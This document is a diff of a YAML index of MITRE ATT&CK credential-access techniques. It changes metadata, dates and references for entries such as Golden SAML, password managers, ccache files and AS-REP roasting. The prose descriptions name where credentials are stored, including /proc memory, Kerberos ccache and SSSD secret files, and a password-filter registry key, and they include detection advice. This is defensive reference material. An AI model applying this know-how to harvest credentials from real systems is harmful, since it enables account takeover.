@@ -44483,14 +45134,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
       - SaaS
       - Windows
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -44531,14 +45182,11 @@ credential-access:
         url: https://www.sygnia.co/golden-saml-advisory
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1606.002
     atomic_tests: []
   T1003.007:
     technique:
-      modified: '2024-04-10T16:41:01.496Z'
+      modified: '2024-10-15T15:13:32.253Z'
       name: 'OS Credential Dumping: Proc Filesystem'
       description: |-
         Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
@@ -44601,81 +45249,79 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.007
     atomic_tests: []
   T1555.005:
     technique:
+      modified: '2024-08-19T13:53:33.661Z'
+      name: Password Managers
+      description: |-
+        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_contributors:
+      - Matt Burrough, @mattburrough, Microsoft
+      x_mitre_deprecated: false
+      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+        for suspicious activity that could indicate searching in process memory of
+        password managers. \n\nConsider monitoring file reads surrounding known password
+        manager applications."
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Matt Burrough, @mattburrough, Microsoft
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      - 'Process: OS API Execution'
+      - 'File: File Access'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
       created: '2021-01-22T16:08:40.629Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1555.005
         url: https://attack.mitre.org/techniques/T1555/005
-      - source_name: ise Password Manager February 2019
-        url: https://www.ise.io/casestudies/password-manager-hacking/
-        description: 'ise. (2019, February 19). Password Managers: Under the Hood
-          of Secrets Management. Retrieved January 22, 2021.'
+        external_id: T1555.005
+      - source_name: Cyberreason Anchor December 2019
+        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+          10, 2020.'
+        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
       - source_name: FoxIT Wocao December 2019
-        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
         description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
           Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
           October 8, 2020.'
+        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+      - source_name: ise Password Manager February 2019
+        description: 'ise. (2019, February 19). Password Managers: Under the Hood
+          of Secrets Management. Retrieved January 22, 2021.'
+        url: https://www.ise.io/casestudies/password-manager-hacking/
       - source_name: Github KeeThief
-        url: https://github.com/GhostPack/KeeThief
         description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
           2021.
+        url: https://github.com/GhostPack/KeeThief
       - source_name: NVD CVE-2019-3610
-        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
         description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
           Detail. Retrieved April 14, 2021.
-      - source_name: Cyberreason Anchor December 2019
-        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
-        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
-          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
-          10, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Password Managers
-      description: |-
-        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
-        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
-         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
-      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
-        for suspicious activity that could indicate searching in process memory of
-        password managers. \n\nConsider monitoring file reads surrounding known password
-        manager applications."
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      - 'Process: OS API Execution'
-      - 'File: File Access'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -44760,12 +45406,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests: []
   T1552.002:
     technique:
-      modified: '2023-07-28T18:29:56.525Z'
+      modified: '2024-10-15T16:26:46.873Z'
       name: 'Unsecured Credentials: Credentials in Registry'
       description: |-
         Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -44814,38 +45459,13 @@ credential-access:
         url: https://pentestlab.blog/2017/04/19/stored-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.002
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -44869,76 +45489,129 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
-  T1558.004:
-    technique:
-      x_mitre_platforms:
-      - Windows
+  T1558.005:
+    technique:
+      modified: '2024-10-14T21:26:37.856Z'
+      name: Ccache Files
+      description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+        credential cache files (or ccache). These files are used for short term storage
+        of a user's active session credentials. The ccache file is created upon user
+        authentication and allows for access to multiple services without the user
+        having to re-enter credentials. \n\nThe <code>/etc/krb5.conf</code> configuration
+        file and the <code>KRB5CCNAME</code> environment variable are used to set
+        the storage location for ccache entries. On Linux, credentials are typically
+        stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+        On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+        naming scheme. Typically, users interact with ticket storage using <code>kinit</code>,
+        which obtains a Ticket-Granting-Ticket (TGT) for the principal; <code>klist</code>,
+        which lists obtained tickets currently held in the credentials cache; and
+        other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+        Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+        on disk and authenticate as the current user without their password to perform
+        [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+        Adversaries can also use these tickets to impersonate legitimate users with
+        elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+        Tools like Kekeo can also be used by adversaries to convert ccache files to
+        Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+        On macOS, adversaries may use open-source tools or the Kerberos framework
+        to interact with ccache files and extract TGTs or Service Tickets via lower-level
+        APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+        Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Nisani, Cymptom
-      - James Dunn, @jamdunnDFW, EY
-      - Swapnil Kumbhar
-      - Jacques Pluviose, @Jacqueswildy_IT
-      - Dan Nutting, @KerberToast
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Access'
       type: attack-pattern
-      created: '2020-08-24T13:43:00.028Z'
+      id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+      created: '2024-09-17T15:02:31.324Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1558.004
-        url: https://attack.mitre.org/techniques/T1558/004
-      - source_name: Harmj0y Roasting AS-REPs Jan 2017
-        url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
-        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
-          24, 2020.
-      - source_name: Microsoft Kerberos Preauth 2014
-        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
-        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
-          It Should Not Be Disabled. Retrieved August 25, 2020.'
-      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
-        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
-        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
-          with AS-REP Roasting. Retrieved August 24, 2020.
-      - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        source_name: SANS Attacking Kerberos Nov 2014
-        url: https://redsiege.com/kerberoast-slides
-      - url: https://adsecurity.org/?p=2293
-        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
-          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
-          Domain. Retrieved March 22, 2018.
-        source_name: AdSecurity Cracking Kerberos Dec 2015
-      - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        source_name: Microsoft Detecting Kerberoasting Feb 2018
-      - source_name: Microsoft 4768 TGT 2017
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
-        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
-          ticket (TGT) was requested. Retrieved August 24, 2020.'
-      modified: '2021-06-07T19:23:33.039Z'
+        url: https://attack.mitre.org/techniques/T1558/005
+        external_id: T1558.005
+      - source_name: Binary Defense Kerberos Linux
+        description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+          October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+          APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+        url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+      - source_name: Kerberos GNU/Linux
+        description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+          Compendium (GNU/Linux). Retrieved September 17, 2024.
+        url: https://adepts.of0x.cc/kerberos-thievery-linux/
+      - source_name: Kekeo
+        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+        url: https://github.com/gentilkiwi/kekeo
+      - source_name: SpectorOps Bifrost Kerberos macOS 2019
+        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+          Retrieved October 6, 2021.
+        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+      - source_name: Brining MimiKatz to Unix
+        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+          Mimikatz et al to UNIX. Retrieved October 13, 2021.
+        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+      - source_name: Linux Kerberos Tickets
+        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+          Teams. Retrieved October 4, 2021.
+        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1558.004:
+    technique:
+      modified: '2024-10-15T15:32:07.850Z'
       name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
       description: "Adversaries may reveal credentials of accounts that have disabled
         Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
@@ -44973,6 +45646,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Yossi Nisani, Cymptom
+      - James Dunn, @jamdunnDFW, EY
+      - Swapnil Kumbhar
+      - Jacques Pluviose, @Jacqueswildy_IT
+      - Dan Nutting, @KerberToast
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -44980,32 +45660,68 @@ credential-access:
         pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
         Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
         Microsoft 4768 TGT 2017)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Credential Request'
-      x_mitre_permissions_required:
-      - User
       x_mitre_system_requirements:
       - Valid domain account
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      created: '2020-08-24T13:43:00.028Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1558/004
+        external_id: T1558.004
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+      - source_name: Harmj0y Roasting AS-REPs Jan 2017
+        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+          23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+          with AS-REP Roasting. Retrieved August 24, 2020.
+        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
+      - source_name: AdSecurity Cracking Kerberos Dec 2015
+        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+          Domain. Retrieved March 22, 2018.
+        url: https://adsecurity.org/?p=2293
+      - source_name: Microsoft 4768 TGT 2017
+        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+          ticket (TGT) was requested. Retrieved August 24, 2020.'
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+      - source_name: Microsoft Kerberos Preauth 2014
+        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+          It Should Not Be Disabled. Retrieved August 25, 2020.'
+        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.004
     atomic_tests: []
   T1558:
     technique:
-      modified: '2024-03-01T16:58:02.395Z'
+      modified: '2024-09-17T19:49:11.455Z'
       name: Steal or Forge Kerberos Tickets
       description: |
         Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting.  Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
 
         On Windows, the built-in <code>klist</code> utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
-        Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in <code>/var/lib/sss/secrets/secrets.ldb</code> as well as the corresponding key located in <code>/var/lib/sss/secrets/.secrets.mkey</code>. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
-        Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the <code>/etc/krb5.conf</code> configuration file and the <code>KRB5CCNAME</code> environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using <code>kinit</code>, <code>klist</code>, <code>ktutil</code>, and <code>kcc</code> built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
@@ -45041,7 +45757,7 @@ credential-access:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Logon Session: Logon Session Metadata'
@@ -45066,13 +45782,6 @@ credential-access:
         description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
           using Azure Security Center. Retrieved March 23, 2018.
         url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Kekeo
-        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
-        url: https://github.com/gentilkiwi/kekeo
-      - source_name: SpectorOps Bifrost Kerberos macOS 2019
-        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
-          Retrieved October 6, 2021.
-        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
       - source_name: Medium Detecting Attempts to Steal Passwords from Memory
         description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
           from Memory. Retrieved October 11, 2019.
@@ -45081,14 +45790,6 @@ credential-access:
         description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
           Attacks. Retrieved February 27, 2020.
         url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
-      - source_name: macOS kerberos framework MIT
-        description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
-          for Macintosh Preferences Documentation. Retrieved October 6, 2021.
-        url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
-      - source_name: MIT ccache
-        description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
-          Documentation: Credential Cache. Retrieved October 4, 2021.'
-        url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
@@ -45110,23 +45811,14 @@ credential-access:
         description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
           Secret Decoder Ring. Retrieved February 27, 2020.
         url: https://adsecurity.org/?p=227
-      - source_name: Brining MimiKatz to Unix
-        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
-          Mimikatz et al to UNIX. Retrieved October 13, 2021.
-        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
-      - source_name: Linux Kerberos Tickets
-        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
-          Teams. Retrieved October 4, 2021.
-        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555:
     technique:
-      modified: '2024-02-26T14:19:09.417Z'
+      modified: '2024-10-15T14:57:46.850Z'
       name: Credentials from Password Stores
       description: 'Adversaries may search for common password storage locations to
         obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
@@ -45177,12 +45869,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555
     atomic_tests: []
   T1552:
     technique:
-      modified: '2024-04-15T21:33:12.892Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Unsecured Credentials
       description: 'Adversaries may search compromised systems to find and obtain
         insecurely stored credentials. These credentials can be stored and/or misplaced
@@ -45194,6 +45885,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
